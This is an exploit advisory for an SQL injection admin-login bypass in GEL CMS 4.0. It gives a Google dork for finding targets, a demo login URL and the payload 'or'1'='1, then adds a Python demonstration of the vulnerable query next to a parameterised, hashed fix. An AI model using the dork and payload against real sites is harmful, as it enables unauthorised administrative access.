
SQLi Bypass super-admin GEL CMS 4.0

Author: Guillermo Garcia Marcos, Published: 14-08-2014


# Exploit Title: SQLi Bypass super-admin GEL CMS 4.0
# Google Dork: inurl:/contact-us_id7.php
# Date: 11 August 2014
# Exploit Author: Guillermo Garcia Marcos @GuilleSec
# Severity: High
# Vendor Homepage: http://www.oklahoma-website-design.com/
# Software Link: http://www.oklahoma-website-design.com/
# Versions: 4.00 and latest versions.
# Tested on: Debian (Apache+MySQL)

DEMO: http://www.oklahoma-website-design.com/login.php

Login panel:

domain.lol/login.php

SQL string:

Username: 'or'1'='1
Password: 'or'1'='1
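
Why the string above passes the login check, and the query form that rejects it, shown as an added example that is not GEL CMS code (the page does not show the CMS source). The table layout, column names, sample accounts and the concatenated query shape are assumptions, and sqlite3 stands in for the MySQL backend.

```python
import hashlib
import hmac
import os
import sqlite3

PAYLOAD = "'or'1'='1"  # the string the advisory enters in both fields

def make_db():
    """Constructed sample data; table and column names are assumptions."""
    db = sqlite3.connect(":memory:")
    db.execute("CREATE TABLE users (id INTEGER PRIMARY KEY, username TEXT, "
               "role TEXT, pw_plain TEXT, salt BLOB, pw_hash BLOB)")
    for name, role, pw in [("root", "super-admin", "S3cret!"),
                           ("editor", "editor", "hunter2")]:
        salt = os.urandom(16)
        digest = hashlib.pbkdf2_hmac("sha256", pw.encode(), salt, 100_000)
        # pw_plain exists only so the vulnerable variant below can run
        db.execute("INSERT INTO users (username, role, pw_plain, salt, pw_hash) "
                   "VALUES (?, ?, ?, ?, ?)", (name, role, pw, salt, digest))
    return db

def login_vulnerable(db, username, password):
    # Assumed flaw: form input is pasted into the SQL text, so a quote in the
    # input closes the literal and the rest is parsed as SQL. With PAYLOAD the
    # WHERE clause becomes  username=''or'1'='1' AND pw_plain=''or'1'='1'
    # which is true for every row; the first row (here the super-admin) wins.
    sql = ("SELECT username, role FROM users "
           f"WHERE username = '{username}' AND pw_plain = '{password}'")
    return db.execute(sql).fetchone()

def login_hardened(db, username, password):
    # Bound parameter: the input is only ever a value, never SQL syntax.
    row = db.execute("SELECT username, role, salt, pw_hash FROM users "
                     "WHERE username = ?", (username,)).fetchone()
    if row is None:
        return None
    # The password never reaches the query; compare salted hashes instead.
    candidate = hashlib.pbkdf2_hmac("sha256", password.encode(), row[2], 100_000)
    return (row[0], row[1]) if hmac.compare_digest(candidate, row[3]) else None

if __name__ == "__main__":
    db = make_db()
    print("vulnerable:", login_vulnerable(db, PAYLOAD, PAYLOAD))
    print("hardened:  ", login_hardened(db, PAYLOAD, PAYLOAD))
    print("legit user:", login_hardened(db, "root", "S3cret!"))
```

In PHP the same fix is a prepared statement (PDO or mysqli) with bound parameters plus `password_hash()` / `password_verify()`.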
